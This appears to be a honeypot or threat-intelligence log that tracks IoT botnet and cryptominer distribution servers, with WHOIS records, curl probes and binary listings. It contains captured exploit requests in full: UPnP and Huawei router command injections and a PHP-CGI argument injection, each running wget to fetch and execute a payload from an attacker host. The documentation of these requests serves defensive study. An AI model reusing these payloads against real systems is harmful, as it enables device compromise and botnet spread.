arm6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
arm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
jklarm: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
jklarm5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
jklarm6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
jklarm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
jklm68k: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
jklmips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
jklmpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
jklppc: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
jklspc: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
jklx86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
m68k: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
mpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
nabarm: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
nabarm5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
nabarm6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
nabarm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
nabm68k: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
nabmips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
nabmpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
nabppc: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
nabspc: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
nabx86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
ppc: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
sh: ASCII text
spc: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
u: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
inetnum: 31.220.0.0 - 31.220.3.255
netname: BZ-ESCUR1
descr: KODDOS
country: BZ
org: ORG-ES189-RIPE
admin-c: RL8716-RIPE
tech-c: RL8716-RIPE
status: ASSIGNED PA
mnt-by: TERRATRANSIT-MNT
mnt-lower: TERRATRANSIT-MNT
mnt-routes: sc-amarutu-1-mnt
created: 2013-02-05T09:23:50Z
last-modified: 2017-03-17T11:45:04Z
source: RIPE
organisation: ORG-ES189-RIPE
org-name: Amarutu Technology Ltd.
org-type: OTHER
address: Level23, One Island East, Westlands Rd
address: Quarry Bay
address: Hong Kong
phone: +852 3750 7973
abuse-c: KDDS9813-RIPE
mnt-ref: TERRATRANSIT-MNT
mnt-by: TERRATRANSIT-MNT
created: 2013-02-05T09:23:38Z
last-modified: 2017-10-30T14:46:54Z
source: RIPE # Filtered
$ curl -i http://31.220.2.52
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 30 Apr 2023 21:55:13 GMT
Content-Type: text/html
Content-Length: 10918
Last-Modified: Mon, 24 Apr 2023 17:05:14 GMT
Connection: keep-alive
ETag: "6446b6ca-2aa6"
Accept-Ranges: bytes
inetnum: 141.98.70.0 - 141.98.71.255
netname: Segna-Technologies
org: ORG-ST305-RIPE
descr: Segna Technologies Virginia
country: US
geoloc: 39.022820 -77.454047
admin-c: SR15045-RIPE
tech-c: SR15045-RIPE
status: ASSIGNED PA
mnt-by: segna-mnt
created: 2022-01-17T10:36:11Z
last-modified: 2022-01-17T12:42:08Z
source: RIPE
organisation: ORG-ST305-RIPE
descr: Segna Technologies
phone: +1 307-333-0779
org-name: Segna Technologies
org-type: OTHER
address: 1611 E 2nd St Suite # 79, Casper WY 82601
abuse-c: ACRO38619-RIPE
mnt-ref: segna-mnt
mnt-by: segna-mnt
created: 2021-01-26T10:07:39Z
last-modified: 2021-01-26T10:13:40Z
source: RIPE # Filtered
$ curl -i http://141.98.10.75/
HTTP/1.1 403 Forbidden
Date: Fri, 12 May 2023 01:28:31 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Apache HTTP Server Test Page powered by CentOS</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
inetnum: 141.98.10.0 - 141.98.10.255
netname: LT-HOSTBALTIC-10
country: LT
admin-c: PV7242-RIPE
tech-c: PV7242-RIPE
status: ASSIGNED PA
mnt-by: mnt-lt-hostbaltic-1
created: 2019-01-10T13:11:38Z
last-modified: 2019-01-10T13:11:38Z
source: RIPE
person: Paulius Vancugovas
address: Draugystes g. 19
address: 51230
address: Kaunas
address: LITHUANIA
phone: +37067358624
nic-hdl: PV7242-RIPE
mnt-by: mnt-lt-hostbaltic-1
created: 2019-01-08T13:14:38Z
last-modified: 2019-01-09T13:14:40Z
source: RIPE
$ curl -i http://141.98.10.75
HTTP/1.1 403 Forbidden
Date: Sun, 21 May 2023 17:16:26 GMT
Server: Apache/2.4.37 (centos)
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="generator" content="HTML Tidy for HTML5 for Linux version 5.7.28">
<title>HTTP Server Test Page powered by CentOS</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="shortcut icon" href="http://www.centos.org/favicon.ico">
<style type="text/css">
inetnum: 141.98.6.0 - 141.98.6.255
netname: Serverion_BV-NET
country: NL
org: ORG-DCB8-RIPE
abuse-c: SB27731-RIPE
admin-c: SB27731-RIPE
tech-c: SB27731-RIPE
status: ASSIGNED PA
mnt-by: MNT-MCONSULTING
created: 2022-06-10T08:21:58Z
last-modified: 2022-09-26T14:33:32Z
source: RIPE
mnt-domains: mnt-nl-descapital-1
mnt-routes: mnt-nl-descapital-1
mnt-lower: mnt-nl-descapital-1
organisation: ORG-DCB8-RIPE
org-name: Des Capital B.V.
country: NL
org-type: LIR
address: Krammer 8
address: 3232HE
address: Brielle
address: NETHERLANDS
phone: +31851308338
phone: +13023803902
admin-c: AA35882-RIPE
tech-c: TA7409-RIPE
abuse-c: AR60082-RIPE
curl -i http://141.98.6.145
HTTP/1.1 403 Forbidden
Date: Sun, 21 May 2023 17:25:48 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Apache HTTP Server Test Page powered by CentOS</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
POST /picsdesc.xml HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
User-Agent: Hello-World
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding//%22%3E<s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://141.98.6.145/nigger.mips; chmod +x mips; ./mips</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /cdn-cgi/
User-Agent:
HTTP/1.1 404 Not Found
Server: Apache
Content-Length:
HTTP/1.1 200 OK
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.6.145 -l /tmp/kh -r /nigger.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
inetnum: 84.54.50.0 - 84.54.50.255
netname: SERVERION_BV-NET
org: ORG-DCB8-RIPE
country: NL
admin-c: EA7138-RIPE
tech-c: EA7138-RIPE
abuse-c: AR63171-RIPE
status: ASSIGNED PA
mnt-by: MNT-NETERRA
mnt-routes: lir-us-delis-1-MNT
mnt-domains: lir-us-delis-1-MNT
mnt-routes: mnt-nl-descapital-1
mnt-domains: mnt-nl-descapital-1
created: 2023-02-23T09:09:03Z
last-modified: 2023-02-23T10:08:54Z
source: RIPE
organisation: ORG-DCB8-RIPE
org-name: Des Capital B.V.
country: NL
org-type: LIR
address: Krammer 8
address: 3232HE
address: Brielle
address: NETHERLANDS
phone: +31851308338
phone: +13023803902
admin-c: AA35882-RIPE
curl -i http://84.54.50.163/
HTTP/1.1 403 Forbidden
Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 21 May 2023 17:29:41 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>
scamanje.stresserit.pro. 60 IN A 3.141.96.53
scamanje.stresserit.pro. 60 IN A 3.20.137.44
$ curl -i http://scamanje.stresserit.pro
HTTP/1.1 200 OK
Alt-Svc: h3=":443"; ma=2592000
Server: Caddy
Date: Fri, 18 Aug 2023 04:24:17 GMT
Content-Length: 0
$ curl -i https://scamanje.stresserit.pro
curl: (35) OpenSSL/3.0.9: error:0A000438:SSL routines::tlsv1 alert internal error
$ curl -i scamanje.stresserit.pro/jaws
HTTP/1.1 200 OK
Alt-Svc: h3=":443"; ma=2592000
Server: Caddy
Date: Fri, 18 Aug 2023 04:25:07 GMT
Content-Length: 0
Looks cleaned up once I got to it. Seems to be an infected German FiveM server:
POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%
63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%6
9%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%6
9%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1\x0d\x0aHost: -c\x0d\x0aContent-Type: application/x-www-form-urlencoded\x0d\x0aContent-Length: 109\x0d\x0a\x0d\x0a<? system("cd /tmp ; wget http://193.41.237.61/testperl;perl testperl;rm -rf testperl;history -c;clear "); ?>
Decoded:
cgi-binphp?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-d+auto_prepend_file=php://input+-n
Reverse DNS:
61.237.41.193.in-addr.arpa. 86400 IN PTR v60340.php-friends.de.
POST /upload HTTP/1.1\x0d\x0aHost: ##bcable-redacted##\x0d\x0aUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\x0d\x0aConnection: close\x0d\x0aContent-Length: 1044\x0d\x0aAuthorization: QUt6NkpTeTE6dmk4cW8=\x0d\x0aContent-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536\x0d\x0aCookie: sessionid=\x27`wget http://ciio8f499hr3v1gg0ehgn3rme8stmpmc6.oast.me`\x27\x0d\x0aAccept-Encoding: gzip\x0d\x0a\x0d\x0a-----------------------------392306610282184777655655237536\x0d\x0aContent-Disposition: form-data; name="option"\x0d\x0a\x0d\x0a5NW9Cw1J\x0d\x0a-----------------------------392306610282184777655655237536\x0d\x0aContent-Disposition: form-data; name="destination"\x0d\x0a\x0d\x0aJ0I5k131j2Ku\x0d\x0a-----------------------------392306610282184777655655237536\x0d\x0aContent-Disposition: form-data; name="file.path"\x0d\x0a\x0d\x0aEKsmqqg0\x0d\x0a-----------------------------392306610282184777655655237536\x0d\x0aContent-Disposition: form-data; name="file"; filename="config.xml"\x0d\x0aContent-Type: application/xml\x0d\x0a\x0d\x0aqJ57CM9\x0d\x0a-----------------------------392306610282184777655655237536\x0d\x0aContent-Disposition: form-data; name="filename"\x0d\x0a\x0d\x0aJbYXJR74n.xml\x0d\x0a-----------------------------392306610282184777655655237536\x0d\x0aContent-Disposition: form-data; name="GXbLINHYkFI"\x0d\x0a\x0d\x0a<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>\x0d\x0a-----------------------------392306610282184777655655237536--\x0d\x0a
Looking at the output of the wget:
$ curl -i ciio8f499hr3v1gg0ehgn3rme8stmpmc6.oast.me
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: oast.me
X-Interactsh-Version: 1.1.5
Date: Fri, 18 Aug 2023 16:17:28 GMT
Content-Length: 72
<html><head></head><body>6cmpmts8emr3nghe0gg1v3rh994f8oiic</body></html>
Seems to be obfuscating the session id, or making a dynamic one, for the attack.
inetnum: 114.67.64.0 - 114.67.255.255
netname: JDCOM
descr: Beijing Jingdong 360 Degree E-commerce Co., Ltd.
country: CN
admin-c: LY4075-AP
tech-c: WD815-AP
abuse-c: AC1601-AP
status: ALLOCATED PORTABLE
mnt-by: MAINT-CNNIC-AP
mnt-lower: MAINT-CNNIC-AP
mnt-routes: MAINT-CNNIC-AP
mnt-irt: IRT-JDCOM-CN
last-modified: 2022-01-18T08:32:37Z
source: APNIC
irt: IRT-JDCOM-CN
address: Beijing city Chaoyang District Beichen road
address: A Beichen Century Center No. 8 16 storey
e-mail: wanglujia@jd.com
abuse-mailbox: wanglujia@jd.com
auth: # Filtered
admin-c: ZY3570-AP
tech-c: ZK326-AP
mnt-by: MAINT-CNNIC-AP
last-modified: 2021-08-25T08:37:53Z
source: APNIC
$ curl -i 114.67.217.170
HTTP/1.1 403 Forbidden
Date: Fri, 18 Aug 2023 23:20:33 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Apache HTTP Server Test Page powered by CentOS</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
Index of /bins
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] sora.arm 2023-07-09 06:50 27K
[ ] sora.arm5 2023-07-09 06:50 24K
[ ] sora.arm6 2023-07-09 06:50 33K
[ ] sora.arm7 2023-07-09 06:50 52K
[ ] sora.i686 2023-07-09 06:50 29K
[ ] sora.m68k 2023-07-09 06:50 87K
[ ] sora.mips 2023-07-09 06:50 28K
[ ] sora.mpsl 2023-07-09 06:50 29K
[ ] sora.ppc 2023-07-09 06:50 26K
[ ] sora.sh4 2023-07-09 06:50 81K
[ ] sora.spc 2023-07-09 06:50 89K
[ ] sora.x86 2023-07-09 06:50 28K
[ ] sora.x86_64 2023-07-09 06:50 28K
══════════════════════════════════════════════════════════════
sora.arm: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
sora.arm5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
sora.arm6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
sora.arm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
sora.i686: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
sora.m68k: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
sora.mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
sora.mpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
sora.ppc: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), statically linked, no section header
sora.sh4: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
sora.spc: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
sora.x86: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
sora.x86_64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
inetnum: 46.29.166.0 - 46.29.167.255
netname: BX-NETWORK
descr: LLC Baxet
country: RU
admin-c: AP12753-RIPE
tech-c: AP12753-RIPE
status: ASSIGNED PA
mnt-by: BX-NOC
mnt-domains: BX-NOC
mnt-routes: BX-NOC
created: 2013-09-11T18:47:21Z
last-modified: 2013-10-07T18:56:43Z
source: RIPE # Filtered
person: Anton Pankratov
remarks: http://justhost.ru
address: Zelenograd, Sosnovaya alleya, 4, str 2, 33
address: Moscow, Russia
phone: +7 495 6680903
nic-hdl: AP12753-RIPE
created: 2010-10-07T13:49:43Z
last-modified: 2017-10-30T22:11:13Z
source: RIPE # Filtered
mnt-by: BX-NOC
$ curl -i 46.29.166.61
HTTP/1.1 500 INTERNAL SERVER ERROR
Server: Werkzeug/2.3.6 Python/3.8.10
Date: Fri, 18 Aug 2023 23:19:08 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 265
Connection: close
<!doctype html>
<html lang=en>
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
arc: ELF 32-bit LSB executable, Synopsys ARCompact ARC700 cores, version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, for GNU/Linux 4.8.0, stripped
arm: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
arm5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
arm6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
arm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
i5: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
i6: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
m68k: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
mpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
ppc: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
sh: ASCII text
sh4: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
spc: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
x86: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
inetnum: 194.87.48.0 - 194.87.48.255
netname: BG-NETWORK
country: RU
org: ORG-BGI3-RIPE
mnt-domains: BG-MNT
mnt-routes: BG-MNT
admin-c: BGI13-RIPE
tech-c: BGI13-RIPE
status: ASSIGNED PA
mnt-by: interlir-mnt
mnt-by: lir-ae-rcstechnologies-1-MNT
created: 2023-04-06T14:16:25Z
last-modified: 2023-04-06T17:46:18Z
source: RIPE
organisation: ORG-BGI3-RIPE
org-name: Baxet Group Inc.
country: US
org-type: OTHER
geoloc: 39.7456 75.5482
language: EN
address: 2093 PHILADELPHIA PIKE, 6009
address: Claymont, DE 19703-2424
address: US
phone: +1 (917) 938-7088
abuse-c: BGI13-RIPE
mnt-ref: MARTON-MNT
mnt-ref: voldeta-mnt
mnt-ref: interlir-mnt
mnt-ref: RELCOMGROUP-EXT-MNT
mnt-by: BG-MNT
created: 2022-01-27T10:25:14Z
last-modified: 2023-07-24T07:29:22Z
source: RIPE # Filtered
$ curl -i http://194.87.48.216/
HTTP/1.1 403 Forbidden
Date: Fri, 18 Aug 2023 23:31:14 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Apache HTTP Server Test Page powered by CentOS</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
Index of /lx
[ICO] Name Last modified Size Description
═══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] Chaosontopxd.arm 2023-08-05 09:33 31K
[ ] Chaosontopxd.arm5 2023-08-05 09:33 27K
[ ] Chaosontopxd.arm6 2023-08-05 09:33 36K
[ ] Chaosontopxd.arm7 2023-08-05 09:33 56K
[ ] Chaosontopxd.m68k 2023-08-05 09:33 106K
[ ] Chaosontopxd.mips 2023-08-05 09:33 34K
[ ] Chaosontopxd.mpsl 2023-08-05 09:33 35K
[ ] Chaosontopxd.ppc 2023-08-05 09:33 32K
[ ] Chaosontopxd.sh4 2023-08-05 09:33 81K
[ ] Chaosontopxd.spc 2023-08-05 09:33 93K
[ ] Chaosontopxd.x86 2023-08-05 09:33 32K
[ ] a 2023-08-05 09:33 32K
[ ] u 2023-08-05 09:33 34K
[ ] x 2023-08-05 09:33 34K
═══════════════════════════════════════════════════════════════
Chaosontopxd.arm: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
Chaosontopxd.arm5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header
Chaosontopxd.arm6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
Chaosontopxd.arm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, no section header
Chaosontopxd.m68k: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
Chaosontopxd.mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
Chaosontopxd.mpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
Chaosontopxd.ppc: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), statically linked, no section header
Chaosontopxd.sh4: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
Chaosontopxd.spc: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
Chaosontopxd.x86: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
$ md5sum u x lx/Chaosontopxd.mips
73f90642eb891e71caf93d3de2e5a5f7 u
73f90642eb891e71caf93d3de2e5a5f7 x
73f90642eb891e71caf93d3de2e5a5f7 lx/Chaosontopxd.mips
download.asyncfox.xyz. 300 IN A 185.225.75.242
inetnum: 185.225.75.0 - 185.225.75.255
org: ORG-DCB8-RIPE
abuse-c: SB27731-RIPE
netname: SERVERION_BV-NET
country: NL
admin-c: SB27731-RIPE
tech-c: SB27731-RIPE
status: ASSIGNED PA
mnt-by: MNT-NETERRA
mnt-routes: mnt-nl-descapital-1
mnt-domains: mnt-nl-descapital-1
mnt-lower: mnt-nl-descapital-1
created: 2022-06-28T09:01:54Z
last-modified: 2022-09-26T14:48:18Z
source: RIPE
organisation: ORG-DCB8-RIPE
org-name: Des Capital B.V.
country: NL
org-type: LIR
address: Krammer 8
address: 3232HE
address: Brielle
address: NETHERLANDS
phone: +31851308338
phone: +13023803902
admin-c: AA35882-RIPE
tech-c: TA7409-RIPE
abuse-c: AR60082-RIPE
$ curl -i http://download.asyncfox.xyz/
HTTP/1.1 403 Forbidden
Server: nginx/1.18.0
Date: Tue, 29 Aug 2023 19:33:12 GMT
Content-Type: text/html
Content-Length: 153
Connection: keep-alive
<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.18.0</center>
</body>
</html>
$ curl -i http://download.asyncfox.xyz/download/
HTTP/1.1 403 Forbidden
Server: nginx/1.18.0
Date: Tue, 29 Aug 2023 19:32:45 GMT
Content-Type: text/html
Content-Length: 153
Connection: keep-alive
<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.18.0</center>
</body>
</html>
dupa2.sh: Bourne-Again shell script, ASCII text executable
dupa.sh: Bourne-Again shell script, ASCII text executable
xmrig.arm7: ELF 32-bit LSB shared object, ARM, EABI5 version 1 (GNU/Linux), statically linked, no section header
xmrig.arm8: ELF 64-bit LSB shared object, ARM aarch64, version 1 (SYSV), statically linked, no section header
xmrig.i686: ELF 32-bit LSB shared object, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
xmrig.x86_64: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), statically linked, no section header
inetnum: 43.249.172.0 - 43.249.175.255
netname: JUNIUYUN-CN
descr: 111 Sports West
descr: Tianhe District
country: HK
org: ORG-GFBN1-AP
admin-c: JA476-AP
tech-c: JA476-AP
abuse-c: AJ496-AP
status: ALLOCATED PORTABLE
remarks: --------------------------------------------------------
remarks: To report network abuse, please contact mnt-irt
remarks: For troubleshooting, please contact tech-c and admin-c
remarks: Report invalid contact via www.apnic.net/invalidcontact
remarks: --------------------------------------------------------
mnt-by: APNIC-HM
mnt-lower: MAINT-JUNIUYUN-CN
mnt-routes: MAINT-JUNIUYUN-CN
mnt-irt: IRT-JUNIUYUN-CN
last-modified: 2021-01-08T06:03:12Z
source: APNIC
irt: IRT-JUNIUYUN-CN
address: chian guangdong guangzhou, guangzhou guangdong 510000
e-mail: 919435089@qq.com
abuse-mailbox: 919435089@qq.com
admin-c: JA476-AP
tech-c: JA476-AP
auth: # Filtered
remarks: 919435089@qq.com was validated on 2023-07-18
mnt-by: MAINT-JUNIUYUN-CN
last-modified: 2023-07-18T00:40:32Z
source: APNIC
$ curl -i http://43.249.172.195:888
HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Tue, 29 Aug 2023 19:30:45 GMT
Content-Type: text/html
Content-Length: 615
Last-Modified: Tue, 11 Apr 2023 17:22:34 GMT
Connection: keep-alive
Accept-Ranges: bytes
112: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
123: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Interesting strings:
case $1 in
Content-Length:
POST %s HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Host: %s:%d
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Connection: Keep-Alive
GET %s HTTP/1.1
Accept: */*
Accept-Language: zh-cn
